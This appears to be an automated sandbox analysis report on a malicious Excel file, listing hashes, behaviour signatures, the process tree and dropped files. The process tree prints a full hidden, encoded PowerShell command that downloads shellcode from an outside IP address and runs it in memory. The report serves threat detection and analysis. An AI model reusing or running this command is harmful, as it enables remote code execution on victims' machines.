Analysis

  • max time kernel
    16s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    13-11-2024 21:56

General

  • Target

    c0c6fd29fb0e19068878eceea6dac88812454f226d96f9244851bfd0df89e77c.xls

  • Size

    46KB

  • MD5

    d5f5adcafdae062e965870ced9756be7

  • SHA1

    7cc30262d810e3bfb1c939a5790ec15fb4ff905d

  • SHA256

    c0c6fd29fb0e19068878eceea6dac88812454f226d96f9244851bfd0df89e77c

  • SHA512

    9fdeddc8c8edad7290e77b5a2ec8182641ae7ddb015f5d25ef6d25eb8dc84e148a276404d4387c38cf13482caa3fc5a9258904274dd40cd53c056628743c3b2e

  • SSDEEP

    768:c4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:HSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\c0c6fd29fb0e19068878eceea6dac88812454f226d96f9244851bfd0df89e77c.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3000
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2392
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\-clt0ezx.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2824
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE60.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBE5F.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2660

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\-clt0ezx.dll

    Filesize

    3KB

    MD5

    72d4364b9d808c59025d07a438bc0dee

    SHA1

    961b8ad40c1926b3c32b113cbf1582a39fd0d59e

    SHA256

    f96894db88bdc1ab36250db4807bf4acb0797aeec7e94a9bdd84434d318ce9d9

    SHA512

    7b3632d43ab4cb82c357b2d8eafe4cfc541e8ac1ac6e3b14f33ebb912e403f4a5a5c12f3bd0d6d83e168cc35cc219b300208c11542f723fb95f60ee3276c8e0d

  • C:\Users\Admin\AppData\Local\Temp\-clt0ezx.pdb

    Filesize

    7KB

    MD5

    f0e8ca1b3ccf157c485264d26b759253

    SHA1

    11c92f90fcb97b63af1a45bd22e8957636c0393d

    SHA256

    6dfe410e7d2a90ed23a140330f9d3a9afb707b521ba557a4657fea172174a42c

    SHA512

    ed746861ffbbf4e96b0705e389417afaef0f73139282b52a706875b15f64ecb166d109ac92885fe0029e03973c39d496edc691430400d726de02f96ad4af2c3b

  • C:\Users\Admin\AppData\Local\Temp\RESBE60.tmp

    Filesize

    1KB

    MD5

    95a2ce51bea89a94c3ba114695b20ca3

    SHA1

    530d762b8e66689b95b615a5008b437d7b9b4e2d

    SHA256

    7b93c733cb3cbf7107db74da6d1a8d48797a8af8f8523d5cb6dc3b5d0ca820e9

    SHA512

    bf4cc8343e6934cec4c42afed36022c6684dd0a98b835bd17daeb332a95aa9be187ef5380c6debd614034cf8cada1928ad5a346be32e5c5ff3bb94477c9beca4

  • \??\c:\Users\Admin\AppData\Local\Temp\-clt0ezx.0.cs

    Filesize

    631B

    MD5

    f4dd5c682eb7b3b679f084261bfc7c4c

    SHA1

    70f75d7a4e42c185eb09139ed3c6f7338a2219c2

    SHA256

    2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

    SHA512

    8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

  • \??\c:\Users\Admin\AppData\Local\Temp\-clt0ezx.cmdline

    Filesize

    309B

    MD5

    e7ae6b283d6444a1d1e724fc421551d0

    SHA1

    6d956d316f574e3d6cf74deea5bc0137a6ca0310

    SHA256

    540e864c68a6c016c32278965239357eeb8ba2308ff79b3845ba1abc56772f04

    SHA512

    b3e96c63621c77241a8fa1d344c46965a58d1e305cbd4f4230c9c34f897961d625005a001c22e03724bef82a862d253e7cc47cb5dd2decb1da422c4eea3bc33e

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCBE5F.tmp

    Filesize

    652B

    MD5

    c9bdad78629dd58bff47d3f4d2ebe254

    SHA1

    216a043c403bb6478a86843b0316c0864e273aae

    SHA256

    2dbf83cacdc7827e1abad2dd01f9d766cd81b5f3846cc5b2381a719ed13b2258

    SHA512

    b5279c94d40d121895f1818e169372c9876aef14bac05e165efd9927956caa9c5052b146effb1c481e1922f187ca23c708319cba6f644d52298508b42728137f

  • memory/3000-8-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/3000-6-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/3000-4-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/3000-7-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/3000-3-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/3000-1-0x00000000724CD000-0x00000000724D8000-memory.dmp

    Filesize

    44KB

  • memory/3000-9-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/3000-2-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

  • memory/3000-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/3000-27-0x00000000724CD000-0x00000000724D8000-memory.dmp

    Filesize

    44KB

  • memory/3000-28-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB